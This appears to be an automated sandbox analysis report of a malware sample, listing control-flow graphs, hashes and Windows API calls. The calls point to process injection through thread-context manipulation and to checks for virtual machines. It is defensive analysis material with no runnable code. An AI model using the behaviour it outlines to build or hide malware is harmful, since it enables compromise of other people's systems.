                                                              • Instruction Fuzzy Hash: E1E0123171C215DE8B12852588801FD66A5F99534077118E7D403D7415F7BC6A43A6BB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3dacf9e67b7a018796e5efc32e29be52e9d7f80a66ef19be9e78b0eb35faa6dc
                                                              • Instruction ID: 2eed79c8a8455af7e2e3f5b3cc296cea2b552d00e13625dd74a5a70903ee3494
                                                              • Opcode Fuzzy Hash: 3dacf9e67b7a018796e5efc32e29be52e9d7f80a66ef19be9e78b0eb35faa6dc
                                                              • Instruction Fuzzy Hash: 12D0A77181D380DFCB134B0084920993BB8AE5630032308C3C0408B063D56D0906C3B7

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 4bdd18-4bdd4e 2 4bdd50-4bdd57 0->2 3 4bdd66-4bdd97 0->3 2->3 4 4bdd59-4bdd60 2->4 6 4bdeef-4bdefc 3->6 7 4bdd9d-4bddb4 VirtualAlloc 3->7 4->3 4->6 7->6 9 4bddba-4bddd3 call 4bdd10 VirtualFree 7->9 12 4bddd8-4bdde0 9->12 14 4bdde2-4bddfa call 4bdd08 12->14 19 4bde08 14->19 20 4bddfc-4bde03 14->20 21 4bde0d-4bde15 19->21 20->6 24 4bde17-4bde33 VirtualAlloc 21->24 24->6 26 4bde39-4bde62 call 4bdd10 VirtualFree 24->26 31 4bde67-4bde6f 26->31 33 4bde71-4bde78 31->33 35 4bde7d-4bde85 33->35 37 4bde87-4bdea2 35->37 37->6 41 4bdea4-4bdeb3 37->41 43 4bdeba-4bdebd 41->43 44 4bdeb5 41->44 45 4bdecf-4bdedb SleepEx 43->45 46 4bdebf-4bdec2 43->46 44->43 49 4bdedd-4bdedf call 4b8130 45->49 50 4bdee4-4bdeed 45->50 47 4bdec9-4bdecc 46->47 48 4bdec4 46->48 47->45 48->47 49->50 50->6 50->41
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,20FEF5D5,00003000,00000004), ref: 004BDDAB
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004BDDCE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID: .$E$S
                                                              • API String ID: 2087232378-3797479634
                                                              • Opcode ID: 0d425222cef3699fa6bd29a3fac4caea1a75664e95120dea10f1b3659d61a61f
                                                              • Instruction ID: 4d3cb1f2153dfd55af97550fa0f0daa3680cef1e3acd87d8742de971e504d28b
                                                              • Opcode Fuzzy Hash: 0d425222cef3699fa6bd29a3fac4caea1a75664e95120dea10f1b3659d61a61f
                                                              • Instruction Fuzzy Hash: 18410771F8471526EB607BE64C83BAE25589B11B09F5244BFF64A7D2C2F8FC9810463E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 53 4bd275-4bd27f 54 4bd281-4bd28e 53->54 55 4bd2f0 53->55 56 4bd2f1-4bd305 VirtualAlloc 54->56 60 4bd290-4bd2b8 call 4bda2a 54->60 55->56 58 4ba86b 56->58 59 4bd30b-4bd30d 56->59 64 4bd310 59->64 60->55 64->64
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004BD2FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: MMXe$XenV$nVMM$reVM$t $ware
                                                              • API String ID: 4275171209-3804153228
                                                              • Opcode ID: 265c012178d428d959e7021aae73e46d6d088262144111a79db5f071427c8099
                                                              • Instruction ID: 1e8549a3621baa252dcfb9761708c3ec0470a234f38af023d6f4953a6de884e7
                                                              • Opcode Fuzzy Hash: 265c012178d428d959e7021aae73e46d6d088262144111a79db5f071427c8099
                                                              • Instruction Fuzzy Hash: C5F0F674C05388DECB0A8F9481557DD7F30BF11704F1900CAD5252E252E7348902CB2A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 65 4b9660-4bc59c call 4b9825 * 2 LoadLibraryA 72 4bb2ef-4bb465 65->72 73 4bc5a2-4bc5a8 65->73
                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(?), ref: 004BA264
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: 32$l32$shel$user
                                                              • API String ID: 1029625771-2982339341
                                                              • Opcode ID: 716f046d01602da26caa20e38415b16a8bda18287d36d585571717c2ff4a971d
                                                              • Instruction ID: 65197823f1afc64a6ea6b93ff7ed8f911e24c03c1dda243d965ff4b71b1c8480
                                                              • Opcode Fuzzy Hash: 716f046d01602da26caa20e38415b16a8bda18287d36d585571717c2ff4a971d
                                                              • Instruction Fuzzy Hash: A7F04470D08745EEC701DFE589847DEBBF8AF05300F10489E9506A6211EBB856019B7B

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 76 4bdd16-4bdd4e 79 4bdd50-4bdd57 76->79 80 4bdd66-4bdd97 76->80 79->80 81 4bdd59-4bdd60 79->81 83 4bdeef-4bdefc 80->83 84 4bdd9d-4bddb4 VirtualAlloc 80->84 81->80 81->83 84->83 86 4bddba-4bddd3 call 4bdd10 VirtualFree 84->86 89 4bddd8-4bdde0 86->89 91 4bdde2-4bddfa call 4bdd08 89->91 96 4bde08 91->96 97 4bddfc-4bde03 91->97 98 4bde0d-4bde15 96->98 97->83 101 4bde17-4bde33 VirtualAlloc 98->101 101->83 103 4bde39-4bde62 call 4bdd10 VirtualFree 101->103 108 4bde67-4bde6f 103->108 110 4bde71-4bde78 108->110 112 4bde7d-4bde85 110->112 114 4bde87-4bdea2 112->114 114->83 118 4bdea4-4bdeb3 114->118 120 4bdeba-4bdebd 118->120 121 4bdeb5 118->121 122 4bdecf-4bdedb SleepEx 120->122 123 4bdebf-4bdec2 120->123 121->120 126 4bdedd-4bdedf call 4b8130 122->126 127 4bdee4-4bdeed 122->127 124 4bdec9-4bdecc 123->124 125 4bdec4 123->125 124->122 125->124 126->127 127->83 127->118
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,20FEF5D5,00003000,00000004), ref: 004BDDAB
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004BDDCE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID: .$E$S
                                                              • API String ID: 2087232378-3797479634
                                                              • Opcode ID: 28a1c0a15c49bf8aab80ac2b2df4a8dfb66131a545a43bdec3a9550df2d0ec0e
                                                              • Instruction ID: 58820b5c1730fea57c5d8b310e6d3f3a6fc7a046677abb983dfc81c831c5564c
                                                              • Opcode Fuzzy Hash: 28a1c0a15c49bf8aab80ac2b2df4a8dfb66131a545a43bdec3a9550df2d0ec0e
                                                              • Instruction Fuzzy Hash: FA212470B887412AF7316AA64C13BA7364CC756B14F1248FBF649A95C2F8BC9860857E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 130 4ba226-4ba268 call 4b9825 * 2 LoadLibraryA 136 4bc59a-4bc59c 130->136 137 4bb2ef-4bb465 136->137 138 4bc5a2-4bc5a8 136->138
                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(?), ref: 004BA264
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: l32$shel
                                                              • API String ID: 1029625771-1709104459
                                                              • Opcode ID: a9c99128074d110405ab9455dbfc1f90ba92e2aa7327b0024ee5a19c90d6076e
                                                              • Instruction ID: c2451f108d0db1dd54c96dbf49832ada2150c53d4bf27e5effc7bb864737a278
                                                              • Opcode Fuzzy Hash: a9c99128074d110405ab9455dbfc1f90ba92e2aa7327b0024ee5a19c90d6076e
                                                              • Instruction Fuzzy Hash: A6E06DB0D04345DFCB10EFF189D879ABBF4AF15304B10086E9206A7210EBB89600CB7B

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 141 4ba51e-4ba53b WriteFile CloseHandle
                                                              APIs
                                                              • WriteFile.KERNELBASE(?,?,?,?), ref: 004BA52C
                                                              • CloseHandle.KERNELBASE(?,?,?,?,?), ref: 004BA530
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: CloseFileHandleWrite
                                                              • String ID:
                                                              • API String ID: 1769507746-0
                                                              • Opcode ID: ed51198e4d30cc6016a2df2a2ff5884019adecffbeb254a4651f08340fbd18dc
                                                              • Instruction ID: 98a3aa036e33ab6b4d3670d0e9b0af87e21e262ec13c7df760319d57b32c9f6a
                                                              • Opcode Fuzzy Hash: ed51198e4d30cc6016a2df2a2ff5884019adecffbeb254a4651f08340fbd18dc
                                                              • Instruction Fuzzy Hash: ADD0C972401608FECB109BB4CE4C89FBBBCBF48751B50A86AB10385400DA34E601DF20

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 142 4bdd8a-4bdd97 144 4bdeef-4bdefc 142->144 145 4bdd9d-4bddb4 VirtualAlloc 142->145 145->144 147 4bddba-4bddd3 call 4bdd10 VirtualFree 145->147 150 4bddd8-4bdde0 147->150 152 4bdde2-4bddfa call 4bdd08 150->152 157 4bde08 152->157 158 4bddfc-4bde03 152->158 159 4bde0d-4bde15 157->159 158->144 162 4bde17-4bde33 VirtualAlloc 159->162 162->144 164 4bde39-4bde62 call 4bdd10 VirtualFree 162->164 169 4bde67-4bde6f 164->169 171 4bde71-4bde78 169->171 173 4bde7d-4bde85 171->173 175 4bde87-4bdea2 173->175 175->144 179 4bdea4-4bdeb3 175->179 181 4bdeba-4bdebd 179->181 182 4bdeb5 179->182 183 4bdecf-4bdedb SleepEx 181->183 184 4bdebf-4bdec2 181->184 182->181 187 4bdedd-4bdedf call 4b8130 183->187 188 4bdee4-4bdeed 183->188 185 4bdec9-4bdecc 184->185 186 4bdec4 184->186 185->183 186->185 187->188 188->144 188->179
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,20FEF5D5,00003000,00000004), ref: 004BDDAB
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004BDDCE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID:
                                                              • API String ID: 2087232378-0
                                                              • Opcode ID: 8a153fdb3ab2a3ed38fb03f6c039a7da89a6c9f1d5bc52652e6e19446fbdbed9
                                                              • Instruction ID: eb797a2cd8a99094ae1139de58f9a05fefc4ae6c0a4a54498e9b720d83cb5715
                                                              • Opcode Fuzzy Hash: 8a153fdb3ab2a3ed38fb03f6c039a7da89a6c9f1d5bc52652e6e19446fbdbed9
                                                              • Instruction Fuzzy Hash: EDF05471B8970225F5643BF60C83B5A00448B61B19F6248BFB34B7D5C3ECED9810417E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 191 4b83ea-4b8404 VirtualAlloc 192 4b840a 191->192 193 4b8411-4b9f8d call 4ba8cb VirtualFree 191->193 192->193 197 4bc74c 193->197 198 4bc775 call 4b9cc5 193->198 200 4bc759-4bc773 197->200 201 4bc752 197->201 202 4bc77a-4bc77c 198->202 200->198 201->200 202->197
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE ref: 004B83F8
                                                              • VirtualFree.KERNELBASE(?,?,00008000), ref: 004B9F8A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID:
                                                              • API String ID: 2087232378-0
                                                              • Opcode ID: f45c8208e06d20bdeb35c546c086240e379ada067c714ff9d5dcdd34d3f1269f
                                                              • Instruction ID: 54b08245f474314eb30484963162123c8c2b73f58246847ddc56dc6955a6e7f4
                                                              • Opcode Fuzzy Hash: f45c8208e06d20bdeb35c546c086240e379ada067c714ff9d5dcdd34d3f1269f
                                                              • Instruction Fuzzy Hash: 78F01771208711AFD7106B34CCC8BAF7BB9EF86300F41481AF59296016DB78A8499AB7

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 204 4b8130-4b813c 205 4b813e-4b8151 VirtualProtectEx 204->205 206 4b817c-4b8181 call 4b8130 204->206 208 4b8153-4b8157 205->208 209 4b8186-4bc73d 206->209 210 4b8159 208->210 211 4b815e-4b8167 208->211 216 4bc746 209->216 210->211 211->208 213 4b8169-4b816f 211->213 214 4b8171 213->214 215 4b8176 213->215 214->215 215->206 216->216
                                                              APIs
                                                              • VirtualProtectEx.KERNELBASE(000000FF,?,00005B7E,00000040,?), ref: 004B814C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: c5ee3ee21270aa948f47f23ee469559e080ed7c064997ff9cfcb8968da312b7c
                                                              • Instruction ID: 8b7212dee4f003ef41d3a70e22c8f916b557a3ef3bb14d9c888f7f4b1fbfa0c3
                                                              • Opcode Fuzzy Hash: c5ee3ee21270aa948f47f23ee469559e080ed7c064997ff9cfcb8968da312b7c
                                                              • Instruction Fuzzy Hash: 7D01F270545249AECB009FB8CCC1BDB776CAB06311F1401BEE660662C1DF386602D67A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 217 4b9fc7-4b9fc9 218 4b9fcb-4b9fcf 217->218 219 4b9ffe-4ba000 217->219 220 4b9fdd-4b9fe3 218->220 221 4b9fd5 218->221 222 4bbec9-4bc011 ExitProcess 219->222 223 4ba006-4ba01b call 4b8c54 call 4b8a88 219->223 224 4ba73a-4bb47b call 4bc651 220->224 221->220 233 4ba021-4ba027 223->233 234 4bc017 223->234 224->222 235 4ba02d-4ba031 233->235 236 4ba037 233->236 234->234 235->236 237 4b8bc5-4bd763 235->237 236->224
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 546b83f6e1d79d5cf9e4ec12ab4be084112f0912e1fd08811d549a71cdcf8164
                                                              • Instruction ID: 1c1087e74314eb97161acc17df755ebf0e7cc1d1a249a3980ad50e52522901ad
                                                              • Opcode Fuzzy Hash: 546b83f6e1d79d5cf9e4ec12ab4be084112f0912e1fd08811d549a71cdcf8164
                                                              • Instruction Fuzzy Hash: 71016D70109300CBDA29AB2084D1FEA77B5AF50305F25045FE6968A181EB38EC46DB3B

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 239 4b8a59-4b8a6a 241 4bbec9-4bc011 ExitProcess 239->241 242 4b8a70-4b8a75 239->242 242->241 243 4b8a7b-4bbcc6 242->243
                                                              APIs
                                                              • ExitProcess.KERNEL32(00000000), ref: 004BC011
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: 0f74ad2e50ca0263e8cff12489b293beb0fc35f120e34e6ae27ac75db11ff614
                                                              • Instruction ID: 603f8d1bfca8ee72f5b3fc276f060009a942856d4a1d037b69cf5b3343668c2c
                                                              • Opcode Fuzzy Hash: 0f74ad2e50ca0263e8cff12489b293beb0fc35f120e34e6ae27ac75db11ff614
                                                              • Instruction Fuzzy Hash: 7BE0922000C280DEC717466080A8BFA3FB48F42302F2948CBE1828908AC728C801E677

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 247 4bca98-4bcad9 DeleteFileW call 4bd8c3 call 4ba183 252 4bcade 247->252
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?), ref: 004BCAB8
                                                                • Part of subcall function 004BA183: CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 004BD5DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: File$CreateDelete
                                                              • String ID:
                                                              • API String ID: 1264090339-0
                                                              • Opcode ID: 5efae7b9a7c693be10914b1e4f9b85d0ec24bb5fdafe206af23cb818f9d4ad1b
                                                              • Instruction ID: 009a975a7b582e5dbedef3498d099a47e2f5775fce8837d6f9a9c213f19c6330
                                                              • Opcode Fuzzy Hash: 5efae7b9a7c693be10914b1e4f9b85d0ec24bb5fdafe206af23cb818f9d4ad1b
                                                              • Instruction Fuzzy Hash: FAE0ED7280011EABDB62EFA0CC48EDA777CAF08304F0405D2A519D2001EA349B9A9BB6

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 253 4ba183-4bd5dc CreateFileW 256 4bd5df 253->256 256->256
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 004BD5DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: dffa19b66f2676e0b23e020fa21fd3a361c1c06f788c718d720e6f81f454f383
                                                              • Instruction ID: d4ffe608a41554c5c0d9beb3e216c0ec60dec2e012ac398fb58c24a9f887777b
                                                              • Opcode Fuzzy Hash: dffa19b66f2676e0b23e020fa21fd3a361c1c06f788c718d720e6f81f454f383
                                                              • Instruction Fuzzy Hash: 5ED012A0008284BAE33009138C0EF673D3CE7C2F54E90441AB5035449157645C42A4B7

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 257 4bb55c-4bb56d Wow64GetThreadContext 258 4bcc2b-4bcc37 257->258 259 4bb573 257->259 259->258
                                                              APIs
                                                              • Wow64GetThreadContext.KERNEL32 ref: 004BB568
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: c940c4fbdb8a227fd90e1820844fd7bec71248cfc593cf40ad807790fa859928
                                                              • Instruction ID: fc8283e1a3e2263270b5a3a47ccad2627626b6e01e017e6216b5ec63075ca827
                                                              • Opcode Fuzzy Hash: c940c4fbdb8a227fd90e1820844fd7bec71248cfc593cf40ad807790fa859928
                                                              • Instruction Fuzzy Hash: 4DD01732B04605AFCB119F74C8C82DD7BB6BF5A3017420492D006AA014C738AD10CB6B

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 261 4ba99f-4ba9a7 262 4bd789-4bd794 SetFilePointer 261->262 263 4ba9ad 261->263 263->262
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 33ce7cb4704d78c5ff59e02dce65632046e56471898b183784b9e621423017f9
                                                              • Instruction ID: 09c6ba8f1fe734211bf3953f43930b8fba23d60e1831913ffecdd6c5e773172e
                                                              • Opcode Fuzzy Hash: 33ce7cb4704d78c5ff59e02dce65632046e56471898b183784b9e621423017f9
                                                              • Instruction Fuzzy Hash: 6FD0C972904140FB8B208E1A8CC8CAFBBB9FFD671076148DEF04693104C7346A11DA36
                                                              APIs
                                                              • ExitProcess.KERNEL32(00000000), ref: 004BC011
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: 294473a1f4cbd78927da93ad72eaa01797a8ff8e1db2564b22f9685fcdbe76e8
                                                              • Instruction ID: ac28975eed5a9ac6ac919685e25eb48d45fd8a379ecf3b26a28c5b1c58d34618
                                                              • Opcode Fuzzy Hash: 294473a1f4cbd78927da93ad72eaa01797a8ff8e1db2564b22f9685fcdbe76e8
                                                              • Instruction Fuzzy Hash: 7FD01226344710CBD7212AA584C57DD72915F06305F520077EB0656259D6ECAC47D6BB
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 004BD5DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: f4977b0dedc37f31fd15dbee41b434687c0e700d3f76eb65eb02ffab2570d99a
                                                              • Instruction ID: bca133907180dbde115131f4f552c2365562662e54319caf8d5679ac82751989
                                                              • Opcode Fuzzy Hash: f4977b0dedc37f31fd15dbee41b434687c0e700d3f76eb65eb02ffab2570d99a
                                                              • Instruction Fuzzy Hash: 63C04C70144180B6E7340E13CC4EF5B3E75EBC5B05F91445AB5075C8A18B745D52EA76
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?), ref: 004BCC5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 1ec3c545c7a7529761042c7f9ae70106cf369331c497b79a9f4c7aafe3130ec3
                                                              • Instruction ID: 7e749597201a9e24aafffd0880965a7b73299c1280e49dda019a5b02570e50aa
                                                              • Opcode Fuzzy Hash: 1ec3c545c7a7529761042c7f9ae70106cf369331c497b79a9f4c7aafe3130ec3
                                                              • Instruction Fuzzy Hash: CAD0A730004295DFDB088F21C4CCB987F75FF01300F1441ADC84A4A411D7382440DF71
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 7d6af43bfeff61d590bf5c1244807191be7a95953a7be3e9dd49305a3701093b
                                                              • Instruction ID: 23376cdbf53c31c696391ab2b9559df16f67f696041d64c033b3d6ce79609098
                                                              • Opcode Fuzzy Hash: 7d6af43bfeff61d590bf5c1244807191be7a95953a7be3e9dd49305a3701093b
                                                              • Instruction Fuzzy Hash: 24D0C933700510DB8F11CF09C4C41AEB777FEC13107E24486E0426710497B87D419AA7
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 892761419855abeb9055df8f466bc5d222715ff4f5b4fcc44ca891e8cd09363b
                                                              • Instruction ID: 10549db53c3924baf15e49882e38ce90a3564ce134518200e25aeae0b19b2aff
                                                              • Opcode Fuzzy Hash: 892761419855abeb9055df8f466bc5d222715ff4f5b4fcc44ca891e8cd09363b
                                                              • Instruction Fuzzy Hash: 98D0C232704521CFCB589B18C4E855C7772FF413457E254A5D002AB415C7B47995DF96
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?), ref: 004BCC5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 8730aa73cac959a0bdf7d526b008f0a88574e8a6984f8daf8334c7eb32f2a866
                                                              • Instruction ID: a28ef8d62c349e3c34052934b3976c98d48b3398819068f5a23e8e6d0434722c
                                                              • Opcode Fuzzy Hash: 8730aa73cac959a0bdf7d526b008f0a88574e8a6984f8daf8334c7eb32f2a866
                                                              • Instruction Fuzzy Hash: 18B09B35410412D7CA04051184452D477757B39314B61021AD16991110DE3548125764
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 004BD5DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 67690bbce89891d4f307aead8b27bec104e65bb9a7029d87560e2646fe13ca1d
                                                              • Instruction ID: 7831de93fb568663276acfaa4fc5695f597af193dced40775a07775ae8286323
                                                              • Opcode Fuzzy Hash: 67690bbce89891d4f307aead8b27bec104e65bb9a7029d87560e2646fe13ca1d
                                                              • Instruction Fuzzy Hash: 2AA01130000800EBCB000F02C88808C3B32BF003003020822E0038E830C330B8A2AA83
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
